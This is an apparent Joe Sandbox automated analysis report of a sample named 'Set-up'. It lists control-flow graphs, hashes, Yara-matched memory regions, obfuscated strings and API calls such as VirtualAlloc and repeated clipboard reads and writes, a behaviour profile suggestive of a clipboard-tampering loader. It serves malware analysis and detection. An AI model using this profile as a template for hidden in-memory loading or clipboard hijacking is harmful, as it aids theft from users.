                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID: .dll
                                                                                          • API String ID: 1029625771-2738580789
                                                                                          • Opcode ID: 22e7a93ae9463fbf26fe8a64879a4a4537edfd71a6a3bb27af4a5e412625cd75
                                                                                          • Instruction ID: b542437d2c6df2250ebcd77209f74134f23687b06fe1628f3116afa26c2033d4
                                                                                          • Opcode Fuzzy Hash: 22e7a93ae9463fbf26fe8a64879a4a4537edfd71a6a3bb27af4a5e412625cd75
                                                                                          • Instruction Fuzzy Hash: 6B21E4716062A58FDB25EFADC8C4B6A7BA8EF05624F18506CD8428BA41DB30E8498780

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 313 2a25835-2a25899 call 2a26e10 * 3 320 2a258c2 313->320 321 2a2589b-2a2589d 313->321 323 2a258c5-2a258cf 320->323 321->320 322 2a2589f-2a258a1 321->322 322->320 324 2a258a3-2a258b4 VirtualAlloc 322->324 325 2a258d0-2a258f1 call 2a272db call 2a272ff 324->325 326 2a258b6-2a258bd 324->326 332 2a258f3-2a2592a call 2a26fb4 call 2a26e53 325->332 333 2a2593c-2a25956 call 2a26e10 325->333 326->320 327 2a258bf 326->327 327->320 342 2a25930-2a25936 332->342 343 2a25b84-2a25b8d 332->343 333->320 339 2a2595c 333->339 341 2a25962-2a25968 339->341 344 2a259a4-2a259ad 341->344 345 2a2596a-2a25970 341->345 342->333 342->343 348 2a25b94-2a25b9c 343->348 349 2a25b8f-2a25b92 343->349 346 2a259af-2a259b2 344->346 347 2a259fc-2a25a05 344->347 350 2a25972-2a25975 345->350 351 2a259b5-2a259ce call 2a26e10 346->351 354 2a25a07-2a25a10 call 2a24b27 347->354 355 2a25a1e-2a25a21 347->355 352 2a25bcb 348->352 353 2a25b9e-2a25bc9 call 2a272ff 348->353 349->348 349->352 356 2a25977-2a2597c 350->356 357 2a25989-2a2598b 350->357 376 2a259d0-2a259d8 351->376 377 2a259ed-2a259fa 351->377 362 2a25bcf-2a25bef call 2a272ff 352->362 353->362 358 2a25b80 354->358 379 2a25a16-2a25a1c 354->379 355->358 359 2a25a27-2a25a30 355->359 356->357 364 2a2597e-2a25987 356->364 357->344 365 2a2598d-2a2599b call 2a26c17 357->365 358->343 367 2a25a32 359->367 368 2a25a36-2a25a3d 359->368 389 2a25bf1 362->389 390 2a25bf5-2a25bf7 362->390 364->350 364->357 373 2a259a0-2a259a2 365->373 367->368 374 2a25a6f-2a25a73 368->374 375 2a25a3f-2a25a48 call 2a249c3 368->375 373->341 383 2a25b16-2a25b19 374->383 384 2a25a79-2a25a9b 374->384 391 2a25a57-2a25a60 call 2a24abe 375->391 392 2a25a4a-2a25a51 375->392 376->358 381 2a259de-2a259e7 376->381 377->347 377->351 379->368 381->358 381->377 387 2a25b1b-2a25b1e 383->387 388 2a25b6c-2a25b6e call 2a25f73 383->388 384->358 400 2a25aa1-2a25ab4 call 2a272db 384->400 387->388 393 2a25b20-2a25b23 387->393 399 2a25b73-2a25b74 388->399 389->390 390->323 391->374 411 2a25a62-2a25a69 391->411 392->358 392->391 397 2a25b25-2a25b28 393->397 398 2a25b3d-2a25b4e call 2a25624 393->398 397->398 405 2a25b2a-2a25b2d 397->405 415 2a25b50-2a25b5c call 2a25bfc 398->415 416 2a25b5f-2a25b6a call 2a250f0 398->416 401 2a25b75-2a25b7c 399->401 413 2a25ab6-2a25aba 400->413 414 2a25ad9-2a25b12 400->414 401->358 408 2a25b7e 401->408 406 2a25b34-2a25b3b call 2a26807 405->406 407 2a25b2f-2a25b32 405->407 406->399 407->401 407->406 408->408 411->358 411->374 413->414 418 2a25abc-2a25ac0 413->418 414->358 426 2a25b14 414->426 415->416 416->399 418->383 421 2a25ac2-2a25ad7 call 2a270dd 418->421 421->426 426->383
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02A258AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 110a8e11aacf9450550942e71900ee3962611d5b415020ec746abf44dec659d6
                                                                                          • Instruction ID: 0969073cd438e80a99e82cac96dbf288cfa71c41240d3a1f4fd118ffedcd33f4
                                                                                          • Opcode Fuzzy Hash: 110a8e11aacf9450550942e71900ee3962611d5b415020ec746abf44dec659d6
                                                                                          • Instruction Fuzzy Hash: C4B1E372900722AFCB299B68CCC4BABF7E9FF05314F940519E69992140EF31E558DFA1

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1355 29e31e3-29e3213 call 2a06e92 call 29df0d2 1361 29e3222-29e3247 1355->1361 1361->1361 1362 29e3249-29e3271 1361->1362 1363 29e3272-29e3286 1362->1363 1363->1363 1364 29e3288-29e3309 1363->1364 1365 29e3312-29e3370 1364->1365 1365->1365 1366 29e3372-29e3383 1365->1366 1367 29e33ad-29e33c0 1366->1367 1368 29e3385-29e3393 1366->1368 1370 29e33dd-29e33e7 1367->1370 1371 29e33c2-29e33c3 1367->1371 1369 29e33a2-29e33ab 1368->1369 1369->1367 1369->1369 1372 29e33fd-29e3405 1370->1372 1373 29e33e9-29e33ed 1370->1373 1374 29e33d2-29e33db 1371->1374 1376 29e341d-29e3427 1372->1376 1377 29e3407-29e3408 1372->1377 1375 29e33f2-29e33fb 1373->1375 1374->1370 1374->1374 1375->1372 1375->1375 1379 29e343d-29e3449 1376->1379 1380 29e3429-29e342d 1376->1380 1378 29e3412-29e341b 1377->1378 1378->1376 1378->1378 1382 29e344b-29e344d 1379->1382 1383 29e3463-29e3596 1379->1383 1381 29e3432-29e343b 1380->1381 1381->1379 1381->1381 1384 29e3452-29e345f 1382->1384 1385 29e35a2-29e35c2 1383->1385 1384->1384 1386 29e3461 1384->1386 1385->1385 1387 29e35c4-29e35f4 1385->1387 1386->1383 1388 29e3602-29e361c 1387->1388 1388->1388 1389 29e361e-29e3650 call 29e1492 1388->1389
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: &A-C$,%"3$5Q<S$6E+G$7U9W$8]S_$<?$<Y?[$>M"O$E-A/$I)^+$M%E'$O9M;$P!N#$eI?K$gjzF$htr^$il~l$jabc$jxdV$kbe;${`st
                                                                                          • API String ID: 0-2613286265
                                                                                          • Opcode ID: 3eb152603c7533615ada144dcef7b632b3087a7a6464d1a2fba3d5da55ee1adc
                                                                                          • Instruction ID: ccdedd9af82c47e4e983694364f6ee395a12fa48f5abbc757d09bb6fc7563f3d
                                                                                          • Opcode Fuzzy Hash: 3eb152603c7533615ada144dcef7b632b3087a7a6464d1a2fba3d5da55ee1adc
                                                                                          • Instruction Fuzzy Hash: F4A1DCB050C3D18BD736CF25C4907EBBFE1AF96304F18899DC4CA9B242D735810A8B96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 9$<$<$<$>$>$>$?$?$B$G$H$R$]$]$a$b$l$r
                                                                                          • API String ID: 0-2109406571
                                                                                          • Opcode ID: 7758ab2323f733c805dad363617498de5dd35665a14e8358bc4dd6e5edbdaf38
                                                                                          • Instruction ID: d42d2e31695b6a483a329733c2e6152c2f74c45c89a117edda36d190eb82c6b2
                                                                                          • Opcode Fuzzy Hash: 7758ab2323f733c805dad363617498de5dd35665a14e8358bc4dd6e5edbdaf38
                                                                                          • Instruction Fuzzy Hash: 20B13362A0C7D08AD315817D999135EEEC24BE6228F1D8EAED4E5C73C7D579C806C363
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Cyclical reference$Empty closure$Illegal closure$Missing ]$Missing ]$Missing ]$No previous regular expression$Null pattern inside ()$Null pattern inside \(\)$Null pattern inside \<\>$Pattern too long$Too many () pairs$Too many \(\) pairs$Undetermined reference$Unmatched ($Unmatched )$Unmatched \($Unmatched \)
                                                                                          • API String ID: 0-2700806723
                                                                                          • Opcode ID: e46b83e5810129421068df7f9a597f9f2fcd2e4f1b2c66ee6a68be874a13c2f1
                                                                                          • Instruction ID: f86baac1b03d03df06beed772acfa796f81caf8bdf8be101a88038fdbb582bec
                                                                                          • Opcode Fuzzy Hash: e46b83e5810129421068df7f9a597f9f2fcd2e4f1b2c66ee6a68be874a13c2f1
                                                                                          • Instruction Fuzzy Hash: AA42F671A0C28A8FDB15CF58D480BEEFFB2EB56310F1941AED4959B342C3765846CBA1
                                                                                          APIs
                                                                                          • CLSIDFromProgID.OLE32(mshjdic.hanjadic,?), ref: 00A6D57B
                                                                                          • CoCreateInstance.OLE32(?,00000000,00000001,00C0DB18,?), ref: 00A6D598
                                                                                          • SysAllocString.OLEAUT32(?), ref: 00A6D5E2
                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00A6D629
                                                                                          • SysFreeString.OLEAUT32(?), ref: 00A6D65A
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00A6D669
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6D73D
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000), ref: 00A6D8D4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$AllocFree_invalid_parameter_noinfo_noreturn$CreateFromInstanceProg
                                                                                          • String ID: gfff$gfff$mshjdic.hanjadic
                                                                                          • API String ID: 2540504531-1458457878
                                                                                          • Opcode ID: 0614872b19737dc625ed8a17f0d85247c4e7a56b7353bc535c6c8e3bb2e39650
                                                                                          • Instruction ID: 7ed55f7ab19081ddfa5760daf82bf684da7014b2b9c02685aef81d5e6e24e046
                                                                                          • Opcode Fuzzy Hash: 0614872b19737dc625ed8a17f0d85247c4e7a56b7353bc535c6c8e3bb2e39650
                                                                                          • Instruction Fuzzy Hash: C8027B74E002099FDB14DFA8C984AAEBBF5FF48304F14466DE816AB791DB31A945CF90
                                                                                          APIs
                                                                                            • Part of subcall function 00A71DD0: Sleep.KERNEL32(00000001), ref: 00A71DEF
                                                                                            • Part of subcall function 00A71DD0: OpenClipboard.USER32 ref: 00A71DF6
                                                                                          • EmptyClipboard.USER32 ref: 00A7321E
                                                                                            • Part of subcall function 00A73110: GlobalAlloc.KERNEL32(00000042), ref: 00A73159
                                                                                            • Part of subcall function 00A73110: GlobalLock.KERNEL32(00000000), ref: 00A73169
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00A73250
                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00A73259
                                                                                          • SetClipboardData.USER32(?,00000000), ref: 00A7326E
                                                                                          • GlobalAlloc.KERNEL32(00000042,00000001), ref: 00A73274
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00A73282
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00A73299
                                                                                          • SetClipboardData.USER32(?,00000000), ref: 00A732A3
                                                                                          • SetClipboardData.USER32(?,00000000), ref: 00A732B8
                                                                                          • SetClipboardData.USER32(?,00000000), ref: 00A732C4
                                                                                          • CloseClipboard.USER32 ref: 00A732C6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$Global$Data$AllocLockUnlock$CloseEmptyOpenSleep
                                                                                          • String ID:
                                                                                          • API String ID: 3851127881-0
                                                                                          • Opcode ID: 1b9ec4d244d2dc8c2c5b444dea906f7e022ffb0703c2680bc8500ed6095d18de
                                                                                          • Instruction ID: 95b2e3dfde27bca64a782b8550c2a6ebc997a10439f29cbee7539d7429e55624
                                                                                          • Opcode Fuzzy Hash: 1b9ec4d244d2dc8c2c5b444dea906f7e022ffb0703c2680bc8500ed6095d18de
                                                                                          • Instruction Fuzzy Hash: 67219F72A00214BBDF109BE5DC49BEEBBB9BF19311F018045F949A7191CB78AE40DBA4
                                                                                          APIs
                                                                                            • Part of subcall function 00A71DD0: Sleep.KERNEL32(00000001), ref: 00A71DEF
                                                                                            • Part of subcall function 00A71DD0: OpenClipboard.USER32 ref: 00A71DF6
                                                                                          • IsClipboardFormatAvailable.USER32(?), ref: 00A71E9E
                                                                                          • IsClipboardFormatAvailable.USER32(?), ref: 00A71EAC
                                                                                          • IsClipboardFormatAvailable.USER32(?), ref: 00A71EDD
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00A71EFF
                                                                                          • GlobalSize.KERNEL32(00000000), ref: 00A71F0D
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00A71F27
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00A71F4E
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00A71FAB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$Clipboard$AvailableFormat$LockUnlock$OpenSizeSleep
                                                                                          • String ID:
                                                                                          • API String ID: 1791062969-0
                                                                                          • Opcode ID: 59d42a5ec5efa6a5c62f36621f3533bc865345ea7dd1ed8d5d546b08b91065c2
                                                                                          • Instruction ID: 683e7df88f57c942e816f466d19843ac2155e10d65ed3439d8b8579359410cc5
                                                                                          • Opcode Fuzzy Hash: 59d42a5ec5efa6a5c62f36621f3533bc865345ea7dd1ed8d5d546b08b91065c2
                                                                                          • Instruction Fuzzy Hash: 36519F71A002059BCB14DBA8DC94BBEB7FAEF49714F14C51AF80AD7281DB35E941CB60
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: -,`f$<$<0bb$=`zo$MQOH$SQMP$TPFR$bcw"$cngj$h0Zv$r
                                                                                          • API String ID: 0-534936077
                                                                                          • Opcode ID: e44040a4b2735c65299fc088213c7fada4f07abc1c84e62ae890a2810560b444
                                                                                          • Instruction ID: 2bc26fb3c3473326faacc895629490554c8ee6dcc71363f22ec8696aae8bebc1
                                                                                          • Opcode Fuzzy Hash: e44040a4b2735c65299fc088213c7fada4f07abc1c84e62ae890a2810560b444
                                                                                          • Instruction Fuzzy Hash: 4851B4B050C3808FD3168F2985A176BFFE1AF93215F18899DE4D14B391D37A850ADB67
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: )*+$$-670$4$9:;;$ADD!$MNOH$hi$p$yz{t
                                                                                          • API String ID: 0-965787625
                                                                                          • Opcode ID: 997c608c473af798a2223841e5972ff65f8b077aacc1e5d445cec261a91a756e
                                                                                          • Instruction ID: 065068ba77404dd5d7b5b7b22e3aff799c22bb1751504a7b15fe1d66ed7e16f0
                                                                                          • Opcode Fuzzy Hash: 997c608c473af798a2223841e5972ff65f8b077aacc1e5d445cec261a91a756e
                                                                                          • Instruction Fuzzy Hash: 50A20F71608381CBD774CF29C8907ABBBE6EFC2314F18892CE5C99B291DB758545CB92
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: )*+$$-670$0$9:;;$MNOH$p$yz{t
                                                                                          • API String ID: 0-2815068004
                                                                                          • Opcode ID: 4a64e37e82e3c1a77ac13423150078e1db639cee1c2e3cbc692a8c36cbb6a49d
                                                                                          • Instruction ID: 37f9b83f833730e33c59994f1a3872f7224828c9befee0756a4283cd8ee42f91
                                                                                          • Opcode Fuzzy Hash: 4a64e37e82e3c1a77ac13423150078e1db639cee1c2e3cbc692a8c36cbb6a49d
                                                                                          • Instruction Fuzzy Hash: E82277B010C3C08ED7B5CF65C4947EBBBE5ABD2314F18896DE1C99B292C7798145CB92
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_29d0000_Set-up.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 'O+M$+sq$8$<?$APWE$APWE${+y
                                                                                          • API String ID: 0-3708178263
                                                                                          • Opcode ID: ea674c4bf2a87b14ee99e87b09ce17f5047985dd2b46c3ff27a97b7a549b3d73
                                                                                          • Instruction ID: 2d221d504885a0092cfeb8eaac08bd7cf76681e0b1002425a64d515de7617453
                                                                                          • Opcode Fuzzy Hash: ea674c4bf2a87b14ee99e87b09ce17f5047985dd2b46c3ff27a97b7a549b3d73
                                                                                          • Instruction Fuzzy Hash: 08D1357164D3508BD711CF25D49036BBBE6ABE1704F1DC92CE4DA6B342D7B58906CB82
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: _ENV$constant$field$global$local$method$upvalue
                                                                                          • API String ID: 0-2491131414
                                                                                          • Opcode ID: f9e8364ded9b39e538a49e351cc297dd0645aa4fbdd46c090bed4e8e53df68b3
                                                                                          • Instruction ID: addfd0c95659725e85fcfd8d526e59b57392b6d1edb39abc497293b073f7ce7f
                                                                                          • Opcode Fuzzy Hash: f9e8364ded9b39e538a49e351cc297dd0645aa4fbdd46c090bed4e8e53df68b3
                                                                                          • Instruction Fuzzy Hash: 99812672B010849BCB18CF5AD4A15ADB7FAEF84324B2442F9DD1A9B381E731DD42C780
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID:
                                                                                          • API String ID: 2221118986-0
                                                                                          • Opcode ID: d44b634f8452e2b74674286a20b458c44248eadac3cb6ad0179d14976ddedade
                                                                                          • Instruction ID: c90a8b2aa048e046a9da33a839f31a898ae1564faec234929f1dbc458e3880c3
                                                                                          • Opcode Fuzzy Hash: d44b634f8452e2b74674286a20b458c44248eadac3cb6ad0179d14976ddedade
                                                                                          • Instruction Fuzzy Hash: 01729231E00A48DFCF15EFB8C990AEDBBB2BF49310F284569D856AB345D730A946DB50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %0X$%c%c %03X %03X
                                                                                          • API String ID: 0-1975633477
                                                                                          • Opcode ID: 0199cbf73e3476a6bba0ac761f3b3e2c8d9a0620c3bcb2e3e417a37a33dcfc95
                                                                                          • Instruction ID: be92198d367b737d06c0666779883d169066fd444eda179c76573ffae111d6a5
                                                                                          • Opcode Fuzzy Hash: 0199cbf73e3476a6bba0ac761f3b3e2c8d9a0620c3bcb2e3e417a37a33dcfc95
                                                                                          • Instruction Fuzzy Hash: 49B2F574A00229CFDB64CF28C984FE9B7B1AF49304F1585EAD949AB352D731AE81CF50
                                                                                          APIs
                                                                                          • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF7D
                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00A623BB,3FFFFFFF), ref: 00BFDF8A
                                                                                          • _CxxThrowException.VCRUNTIME140(?,00C4E6BC), ref: 00BFEB61
                                                                                          • _CxxThrowException.VCRUNTIME140(?,00C4E6F4), ref: 00BFEB7E
                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A,?), ref: 00BFEB9D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
